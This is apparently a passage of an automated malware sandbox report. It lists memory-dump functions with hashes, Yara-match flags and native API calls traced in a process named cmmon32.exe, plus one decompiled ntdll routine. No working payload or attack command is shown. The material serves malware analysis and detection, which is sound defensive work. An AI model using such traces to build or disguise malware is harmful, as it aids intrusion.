                                  • Opcode ID: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                  • Instruction ID: 60879254f4dce77215baaa58b5ef322e0dc01fa4294532b92b4409c91d5f8138
                                  • Opcode Fuzzy Hash: 7f35ddbcdeb86bbd7cd53a71a9eb82b573c5e7593e14400f710113eb5dfd0977
                                  • Instruction Fuzzy Hash: 5C90027120144002D1407199844861B5045B7E1381F51C511E5419664CC655896EA261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9B00, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                  • Instruction ID: c34ad746855ddc18a8e82bf7354af4e4c5b17ccb9e3075bf5b716d93701db543
                                  • Opcode Fuzzy Hash: 79963a05b2db0769312c946b6c76f4b49b459b690fee73a6cd43c4624b2e4151
                                  • Instruction Fuzzy Hash: 5A90026124100802D140719984187170046E7D1781F51C111A5018664DC6568A7D76F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9A80, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                  • Instruction ID: 91968a5095059730241b073b04e7b2e4a9e06d4be4f3047325c06f9067227b9d
                                  • Opcode Fuzzy Hash: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                  • Instruction Fuzzy Hash: 9090026120144442D14062994808B1F4145A7E2382F91C119A914A664CC955896D6761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9A10, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                  • Instruction ID: 2cf3fd64b464971903909d1949d60d66a9abc8bb29f4f320b609942e7b2cb07a
                                  • Opcode Fuzzy Hash: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                  • Instruction Fuzzy Hash: 4290027120140402D1006199480C7570045A7D1382F51C111AA158665EC6A5C9A97571
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D95F0, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                  • Instruction ID: b4f5184c1814633a9c0e37445e0277d6b40cbcafc6e692f00f6057b44de8a984
                                  • Opcode Fuzzy Hash: 0f6e7ecb75b9bad78e624129ca25ac6b2cde47b477a1b8cb181c86a260967280
                                  • Instruction Fuzzy Hash: 0590027120100802D104619948086960045A7D1381F51C111AB018765ED6A589A97171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9520, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                  • Instruction ID: abb28047a4b65fa6a75dea74c90990a5679c88bdf8ea4c666089f3ed10f85c5d
                                  • Opcode Fuzzy Hash: c1e6c00962674235f8b81f7c95f5c0c84af77041aa8d89a657990e4e85fce4bb
                                  • Instruction Fuzzy Hash: BD9002E1201140924500A2998408B1A4545A7E1381B51C116E6048670CC5658969A175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018DAD30, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                  • Instruction ID: 90db868ac1da76c0fd97485ea944bc5a41f1b018228acc47b38f7a5aba386e94
                                  • Opcode Fuzzy Hash: 53a0c7ad794f226bcc1f929890a98ae3b71e9fc86b284c3ea39cfe6fa74f8aed
                                  • Instruction Fuzzy Hash: 9E900271A05000129140719948186564046B7E17C1B55C111A5508664CC9948B6D63E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9560, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                  • Instruction ID: 14a718c78006cf1e8df464737b2ac41771e936b093f08341da3c82a27e74b0c0
                                  • Opcode Fuzzy Hash: 7f6ac2a89500d7db7d5c3c459ee30ca2d06950321bc7908b22a6028de89b6200
                                  • Instruction Fuzzy Hash: 75900265221000020145A599060851B0485B7D73D1391C115F640A6A0CC661897D6361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9FE0, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                  • Instruction ID: 728c84c82ce69c5de3b9ea38c88e8e582ab7cebf0184faaf8b87319b51376e91
                                  • Opcode Fuzzy Hash: 9aee380747773235e89c6532043fbc3d93feeae95382f8ee55d46e6bbdb0c276
                                  • Instruction Fuzzy Hash: 1290027131114402D110619984087160045A7D2381F51C511A5818668DC6D589A97162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018DA710, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                  • Instruction ID: 07c35e9c387a935c82e539be96f6b0b9c27f12a0edf3e1939e53d4ba48f64031
                                  • Opcode Fuzzy Hash: 788418f73fb5d7f7c338ff424bb53dbb3b431a65d2cf7afbcca3eac1343fcc36
                                  • Instruction Fuzzy Hash: E7900271301000529500A6D95808A5A4145A7F1381B51D115A9008664CC59489796161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9730, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                                  • Instruction ID: b9a2edf42df7279d00c6d2fd6e7432e236706e1a86a082a4141c2e19a52186cd
                                  • Opcode Fuzzy Hash: 9ae8d50b82b97f076a051c7b5260167dbaa6ed4d92e39e38d21e526352566475
                                  • Instruction Fuzzy Hash: D590026160500402D1407199541C7160055A7D1381F51D111A5018664DC6998B6D76E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9760, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
                                  • Instruction ID: 53321ca8b4f196fd1101a15e274d4cf6aadd8500fcf81bdacf798d8f1c9c6f3e
                                  • Opcode Fuzzy Hash: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
                                  • Instruction Fuzzy Hash: D390027120100403D1006199550C7170045A7D1381F51D511A5418668DD69689697161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018DA770, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                                  • Instruction ID: a68b9a73b4f58e223c00397e911b9f2647d7fd94f7bde252f19a3a3d2430fd3f
                                  • Opcode Fuzzy Hash: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                                  • Instruction Fuzzy Hash: 4590027520504442D50065995808A970045A7D1385F51D511A54186ACDC6948979B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9770, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                                  • Instruction ID: 706adae81fac1b69c5ee255f0a8a3f0fc95bd063adde910edbde5ca7b5747946
                                  • Opcode Fuzzy Hash: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                                  • Instruction Fuzzy Hash: FF90026120504442D1006599540CA160045A7D1385F51D111A60586A5DC6758969B171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D96D0, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                                  • Instruction ID: 7cf915b3097cdc123662fa6e205cee90e65e36a55c402b6ec24c1ef5789a9d81
                                  • Opcode Fuzzy Hash: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                                  • Instruction Fuzzy Hash: 6E90027120100842D10061994408B560045A7E1381F51C116A5118764DC655C9697561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9610, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                                  • Instruction ID: e2a77e1934ce7ececd105d68d442883546b4a4eb8a10d563cd1aa91e7de36d55
                                  • Opcode Fuzzy Hash: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                                  • Instruction Fuzzy Hash: B690027160500802D150719944187560045A7D1381F51C111A5018764DC7958B6D76E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9650, Relevance: .0, Instructions: 4COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                                  • Instruction ID: 8e1f1e5186a7c5c7f42f8fe7f7c89c2d5871950250e4acaace7811e7fde50848
                                  • Opcode Fuzzy Hash: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                                  • Instruction Fuzzy Hash: 9590027120504842D14071994408A560055A7D1385F51C111A50587A4DD6658E6DB6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D9670, Relevance: .0, Instructions: 2COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 70a30b0483fc1539411757e17cdb1b0216f8cd4f454f0515a8d01e42126d9416
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0192FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                  0x0192fdda
                                  0x0192fde2
                                  0x0192fde5
                                  0x0192fdec
                                  0x0192fdfa
                                  0x0192fdff
                                  0x0192fe0a
                                  0x0192fe0f
                                  0x0192fe17
                                  0x0192fe1e
                                  0x0192fe19
                                  0x0192fe19
                                  0x0192fe19
                                  0x0192fe20
                                  0x0192fe21
                                  0x0192fe22
                                  0x0192fe25
                                  0x0192fe40

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                  • Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
                                  • Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                  • Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: cmmon32.exe PID: 6928 Parent PID: 3472 cmmon32.exeCOMMON

                                  Executed Functions

                                  Function 03049DA2, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 3e232ea06e80e67ea3aca892590d871921c1215b8da9aaf311bae8686c7907db
                                  • Instruction ID: 98b55273b55994b562e73ab98403f052f2ac02f4deed65c948419f85fe48c5d1
                                  • Opcode Fuzzy Hash: 3e232ea06e80e67ea3aca892590d871921c1215b8da9aaf311bae8686c7907db
                                  • Instruction Fuzzy Hash: BF1123B6204108BFCB08CF98EC80DEB77ADEF8C750B148658FA5D97241C630E912CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: fcec519d79e84f38b55987dc5800285e114209046ba6eb0e2354c2f6c6b25b2b
                                  • Instruction ID: b3d16a84511791603255f28c1a977b9680823530db2093a1fac36dfbe45783a7
                                  • Opcode Fuzzy Hash: fcec519d79e84f38b55987dc5800285e114209046ba6eb0e2354c2f6c6b25b2b
                                  • Instruction Fuzzy Hash: B601D6B2601508BFCB14DF98DC95EDB77AAEF8C740F118658FA1D97240C630E901CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03044B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03044B77,007A002E,00000000,00000060,00000000,00000000), ref: 03049D9D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 574ae401194254dbca8f30cc0e954272aa4ff3743861a4d6eeb5e2028a452a06
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 32F0BDB2201208BFCB08CF88DC95EEB77ADAF8C754F158248BA1D97240C630E8118BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049DFB, Relevance: 1.6, APIs: 1, Instructions: 63filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(03044D32,5EB6522D,FFFFFFFF,030449F1,?,?,03044D32,?,030449F1,FFFFFFFF,5EB6522D,03044D32,?,00000000), ref: 03049E45
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: d1eda7aa3198bb95c62ab40ee05d0b51407d115eaae47390697213821f52469b
                                  • Instruction ID: df6e3735e44c29150e15d39a1d6d7c1685edef489286976f5010f89e7fabbc39
                                  • Opcode Fuzzy Hash: d1eda7aa3198bb95c62ab40ee05d0b51407d115eaae47390697213821f52469b
                                  • Instruction Fuzzy Hash: 73113CB2200204BFDB14DF99DC81EEB77ADEF8C764F158659FA5D97241C630E9118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(03044D32,5EB6522D,FFFFFFFF,030449F1,?,?,03044D32,?,030449F1,FFFFFFFF,5EB6522D,03044D32,?,00000000), ref: 03049E45
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 10a488b817bcff8709b2f8f2fb6a0508b879b11488c491bac89f61fbd826f1b9
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: 7DF0A4B6200208AFDB14DF89DC91EEB77ADAF8C754F158258BA1D97241D630E9118BA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049F2D, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F69
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: bdc98880d5ea9751645c9c86458361fcd5c2894aacebc82e508431b5a59a9f4b
                                  • Instruction ID: af266f2791038c543b6516dda9ee3a2f5c492f69c47f4d9be9358b14b9424dbe
                                  • Opcode Fuzzy Hash: bdc98880d5ea9751645c9c86458361fcd5c2894aacebc82e508431b5a59a9f4b
                                  • Instruction Fuzzy Hash: 7EF0F8B6650208BFDB18DF98CC91EEB77ADAF88250F118159BA19A7251C631E911CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03032D11,00002000,00003000,00000004), ref: 03049F69
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: e977bf2dde7d5ad5860e24f9b5457fae591d5014b54f23be2a03ac18b0f24e0a
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: D1F015B6200208BFDB14DF89CC81EEB77ADAF88650F118158BE1897241C630F910CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049E7A, Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(03044D10,?,?,03044D10,00000000,FFFFFFFF), ref: 03049EA5
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 82cb5d96092ec4b7fcad9a6c871bb9faadd0436810646d2c0209840af69ba39a
                                  • Instruction ID: ce85a1f0ef0882555544335323eb462c4f902850821709e1f1103bd2c95bd4c2
                                  • Opcode Fuzzy Hash: 82cb5d96092ec4b7fcad9a6c871bb9faadd0436810646d2c0209840af69ba39a
                                  • Instruction Fuzzy Hash: 85E04F766001107FDB11DBB4CC95EE77B28EF49250F154594F958AB241C531EA04C690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03049E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(03044D10,?,?,03044D10,00000000,FFFFFFFF), ref: 03049EA5
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, Offset: 03030000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: a3ba8db9b814a5d6326c0a9c67b526aecc3faf4b7f4374a5cb985cd5be7bd1bf
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 50D01776640314BBE710EF98CC85EE77BACEF88660F1544A9BA5C9B242C530FA0086E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 7f11df7c3bc2a2f1bcb7d626a878b7015fe7a5ce3ecc0a284fb334cb229dc1bb
                                  • Instruction ID: bd2d96ffc324e77735a5ffd19e27cddaa46b4c39cbbc300d9f83ff119c792557
                                  • Opcode Fuzzy Hash: 7f11df7c3bc2a2f1bcb7d626a878b7015fe7a5ce3ecc0a284fb334cb229dc1bb
                                  • Instruction Fuzzy Hash: AC9002E120200103614671594414656410BD7E0245F61C031E1415590DC565E89171A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: bc32ba659efa0e5f32dc1ea777360b3e4ecfae50ffa06c497fed1f3ade3fcbc1
                                  • Instruction ID: cfeaa0b95ad8e90d47cc30f9a518d5578e2edd5e7aee350b580c8b5dd4719d9f
                                  • Opcode Fuzzy Hash: bc32ba659efa0e5f32dc1ea777360b3e4ecfae50ffa06c497fed1f3ade3fcbc1
                                  • Instruction Fuzzy Hash: 559002A5211001032146A55907045470147D7D5395761C031F1416550CD661E86161A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04CA96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.497241388.0000000004C40000.00000040.00000001.sdmp, Offset: 04C40000, based on PE: true
                                  • Associated: 00000010.00000002.497867212.0000000004D5B000.00000040.00000001.sdmp Download File
                                  • Associated: 00000010.00000002.497889964.0000000004D5F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5862b3a7633ca896a9cc08a9519094e28488e5531256640c13e0c6fc7bda3f99
                                  • Instruction ID: 4e265e42ca294c79fd9d48d8215a57f6a50306a371475a8f178e0a5d918eb089
